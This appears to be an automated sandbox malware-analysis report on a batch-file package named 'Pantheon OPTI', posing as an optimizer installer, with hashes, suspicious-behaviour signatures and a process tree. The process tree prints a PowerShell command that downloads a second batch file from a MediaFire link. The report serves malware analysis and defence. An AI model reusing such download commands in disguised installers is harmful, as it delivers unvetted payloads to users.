Analysis
max time kernel: 117s
max time network: 117s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 10/03/2024, 04:34
Static task: static1

Behavioral task: behavioral1
  Sample: Pantheon OPTI/#STEP 1 ( INSTALL ).bat
  Resource: win7-20231129-en

Behavioral task: behavioral2
  Sample: Pantheon OPTI/#STEP 1 ( INSTALL ).bat
  Resource: win10v2004-20240226-en

Behavioral task: behavioral3
  Sample: Pantheon OPTI/#STEP 2 ( MAIN UI ).bat
  Resource: win7-20240221-en

Behavioral task: behavioral4
  Sample: Pantheon OPTI/#STEP 2 ( MAIN UI ).bat
  Resource: win10v2004-20240226-en

Behavioral task: behavioral5
  Sample: Pantheon OPTI/ServiceEnabler ( DO IF NEEDED ).bat
  Resource: win7-20240221-en
General
Target: Pantheon OPTI/#STEP 1 ( INSTALL ).bat
Size: 219B
MD5: e38d3316a4024ac174d42e93978f0ac6
SHA1: 55bbc14e4f035b00d0ffd93ee8f78ba240912c96
SHA256: 27f8ceb3f2b70dc9a9bda00cbc67b1b75f601dd856409fc9ee4553a398b99b05
SHA512: 1bcac4d958f8124f583d3a9529e93cb3f9f29942d6ecb5b49c58e3e0b245c46353f281604ce22f26934e623562895de05f15f5e338b679b4ec78ac0e228f6105
Malware Config
Signatures

- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  948   powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  948   powershell.exe

- Suspicious use of WriteProcessMemory (3 IoCs)
  description                       pid    Process   procid_target
  PID 1972 wrote to memory of 948   1972   cmd.exe   29
  PID 1972 wrote to memory of 948   1972   cmd.exe   29
  PID 1972 wrote to memory of 948   1972   cmd.exe   29
Processes

1. C:\Windows\system32\cmd.exe
   cmd /c "C:\Users\Admin\AppData\Local\Temp\Pantheon OPTI\#STEP 1 ( INSTALL ).bat"
   PID: 1972
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest https://www.mediafire.com/file/ir82iqyjw2edhe6/Pantheonopti.bat/file -Outfile Pantheonopti.bat"
      PID: 948
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken